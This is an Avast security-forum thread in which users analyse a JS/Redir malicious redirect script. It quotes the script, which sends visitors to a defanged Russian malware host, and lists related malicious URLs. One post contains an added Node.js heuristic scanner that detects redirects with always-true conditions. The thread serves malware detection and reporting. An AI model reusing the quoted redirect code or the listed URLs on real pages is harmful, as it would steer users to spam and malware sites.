Avast WEBforum

Other => Viruses and worms => Topic started by: polonus on January 16, 2013, 05:55:28 PM

Title: Is this JS/Redir being detected?
Post by: polonus on January 16, 2013, 05:55:28 PM
See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
The following JS/Redir code was detected via a file viewer.
See code:
Code:
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
</script>
Read on this: http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (post by Conrad Longmore). The redirect page shows:
Please wait a moment ... You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus
Title: Re: Is this JS/Redir being detected?
Post by: !Donovan on January 16, 2013, 06:53:16 PM
Hi Polonus,

This technique is used with various URLs. A search on Google included:
Code:
hXtp://ukr.net
hXtp://topsearch10.com/search.php?aid=62756&q=home+jobs
hXtp://popka-super.ru
hXtp://realstarsearch.com/search.php?q=runescape+automine
hXtp://zaebiz.info
hXtp://global-advers.com/soft.php?aid=0153&d=2&product=XPA
hXtp://www.mp3sugar.com/?aff=2081
hXtp://evamendesochka.com/go.php?sid=9
hXtp://catalog--sites.info/sea
hXtp://yahhooo.info/search.php?q=ritalin&tpl=forbot

Do you see the pattern?
~!Donovan
Title: Re: Is this JS/Redir being detected?
Post by: Pondus on January 16, 2013, 09:36:51 PM
Not detected... Will upload the sample to the avast lab ;)

VirusTotal
https://www.virustotal.com/file/f4ff9fbb00a204237f0f3cf8b87cc63ceb105003910cda53eb46719f2cabb374/analysis/1358368480/
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 16, 2013, 10:10:05 PM
Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the "If var1 Equals var2 Then Redirect!" pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (article by !Donovan).

polonus
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 17, 2013, 03:41:42 PM
There are more variants on the same theme; see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (author: Adam Khoury). The malcode could also be combined with particular escape characters and with malicious spacing code...

polonus
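The "if var1 equals var2 then redirect" pattern quoted in the first post, together with the operator, escape-character and spacing variants mentioned in the post above, as an added example that is not from the thread or from any of the posters: a small Node.js scanner that folds the constant assignments preceding each `if`, evaluates the comparison with the browser's own semantics, and reports only redirects whose condition can never be false. Everything below is constructed for illustration; the `posted` sample mirrors the quoted snippet (URL defanged as in the post), the other samples and the `example.invalid` / `never.invalid` hosts are made up, and the regular expressions are a heuristic, not a JavaScript parser.

```javascript
// Added example, not code from the thread: a heuristic scanner for the
// "if var1 equals var2 then redirect" JS/Redir pattern. It folds the constant
// assignments that run before each `if`, evaluates the comparison as a browser
// would, and flags redirects whose condition can never be false.
// Sample snippets are constructed; URLs are defanged (hxtp://) as in the thread.
const NUMBER = '-?\\d+(?:\\.\\d+)?';
const IDENT = '[A-Za-z_$][\\w$]*';
const QUOTED = '"(?:[^"\\\\]|\\\\.)*"|\'(?:[^\'\\\\]|\\\\.)*\'';

// `name = <number|string|otherName>;` (lookahead after `=` skips a comparison's `==`)
const ASSIGNMENT = new RegExp(
  '(?:\\b(?:var|let|const)\\s+)?\\b(' + IDENT + ')\\s*=(?!=)\\s*(' +
  NUMBER + '|' + QUOTED + '|' + IDENT + ')\\s*;', 'g');

// `if ( lhs OP rhs ) { (document|window).location[.href] = "url"`; operands
// may be numbers, quoted strings or (dotted) identifiers such as document.referrer
const OPERAND = '(' + NUMBER + '|' + QUOTED + '|[A-Za-z_$][\\w$.]*)';
const CONDITIONAL_REDIRECT = new RegExp(
  'if\\s*\\(\\s*' + OPERAND + '\\s*(===|!==|==|!=|>=|<=|>|<)\\s*' + OPERAND +
  '\\s*\\)\\s*\\{?\\s*(?:document|window)\\.location(?:\\.href)?\\s*=\\s*(' +
  QUOTED + ')', 'g');
const SCRIPT_BODY = /<script[^>]*>([\s\S]*?)<\/script>/gi;

// Same semantics the browser applies when it evaluates the condition.
const OPS = {
  '==': (a, b) => a == b, '===': (a, b) => a === b,
  '!=': (a, b) => a != b, '!==': (a, b) => a !== b,
  '>': (a, b) => a > b, '<': (a, b) => a < b,
  '>=': (a, b) => a >= b, '<=': (a, b) => a <= b,
};

// Decode a quoted JS string literal, including \xHH and \uHHHH escapes that
// hide a destination URL from naive string matching.
function decodeJsString(quoted) {
  return quoted.slice(1, -1).replace(
    /\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g,
    (_, esc) => (esc.length > 1
      ? String.fromCharCode(parseInt(esc.slice(1), 16))
      : ({ n: '\n', t: '\t', r: '\r', 0: '\0' }[esc] ?? esc)));
}

// Resolve an operand token to a value, or undefined when it depends on runtime state.
function literalValue(token, consts) {
  if (/^-?\d/.test(token)) return Number(token);
  if (token[0] === '"' || token[0] === "'") return decodeJsString(token);
  return consts.get(token);
}

// Fold constant assignments in source order, following aliases such as var2=var1.
function foldConstants(js) {
  const consts = new Map();
  for (const [, name, rhs] of js.matchAll(ASSIGNMENT)) {
    const value = literalValue(rhs, consts);
    if (value === undefined) consts.delete(name); else consts.set(name, value);
  }
  return consts;
}

function scanScript(js) {
  const findings = [];
  for (const m of js.matchAll(CONDITIONAL_REDIRECT)) {
    const [, lhsTok, op, rhsTok, urlTok] = m;
    const consts = foldConstants(js.slice(0, m.index)); // only code that runs before the `if`
    const lhs = literalValue(lhsTok, consts);
    const rhs = literalValue(rhsTok, consts);
    const constant = lhs !== undefined && rhs !== undefined; // both sides known statically
    findings.push({
      condition: lhsTok + ' ' + op + ' ' + rhsTok,
      constant,
      alwaysTrue: constant ? OPS[op](lhs, rhs) : null,
      target: decodeJsString(urlTok),
    });
  }
  return findings;
}

// Scan every <script> body of a page, or bare JS when there are no tags.
function scanPage(html) {
  const bodies = [...html.matchAll(SCRIPT_BODY)].map((m) => m[1]);
  return (bodies.length ? bodies : [html]).flatMap(scanScript);
}

// Destinations of redirects whose condition is constant and always true.
function findTautologicalRedirects(html) {
  return scanPage(html).filter((f) => f.constant && f.alwaysTrue).map((f) => f.target);
}

// Constructed samples; `posted` mirrors the snippet quoted in the thread.
const CONSTRUCTED_SAMPLES = {
  posted: '<script>\nvar1=49;\nvar2=var1;\n' +
    'if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}\n</script>',
  spaced: "<script>var a = 7 ;  b=a;if( a>=b ){ window.location.href = 'hxtp://\\x65xample.invalid/go.php'; }</script>",
  dead: '<script>x=1;y=2;if(x===y){document.location="hxtp://never.invalid/";}</script>',
  benign: '<script>if(document.referrer==""){document.location="/login.html";}</script>',
};

for (const [name, html] of Object.entries(CONSTRUCTED_SAMPLES)) console.log(name, findTautologicalRedirects(html));
```

Run it with `node jsredir_scan.js`: only `posted` and `spaced` are reported, `dead` (a comparison that is constant but false) and `benign` (a condition that depends on `document.referrer` at runtime) are not, which is the distinction a signature such as "document.location inside an if" cannot make. The scanner deliberately stops at straight-line code; a variant that builds the URL by concatenation or runs through `eval` needs a real parser or a sandboxed run of the kind the Wepawet and Zulu reports linked in the thread provide.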
Title: Re: Is this JS/Redir being detected?
Post by: !Donovan on January 17, 2013, 05:59:53 PM
Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 17, 2013, 09:03:39 PM
Hi !Donovan,

Good you alerted us to that. It seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on the VirusWatch Archives, and then I just fed the URIs to redleg's file viewer, as I later reported to virus AT avast dot com. In a NoScript-protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam-click related malcode...

polonus
Title: Re: Is this JS/Redir being detected?
Post by: Pondus on January 17, 2013, 09:12:14 PM
The URL hhac.net/upload.htm is now down...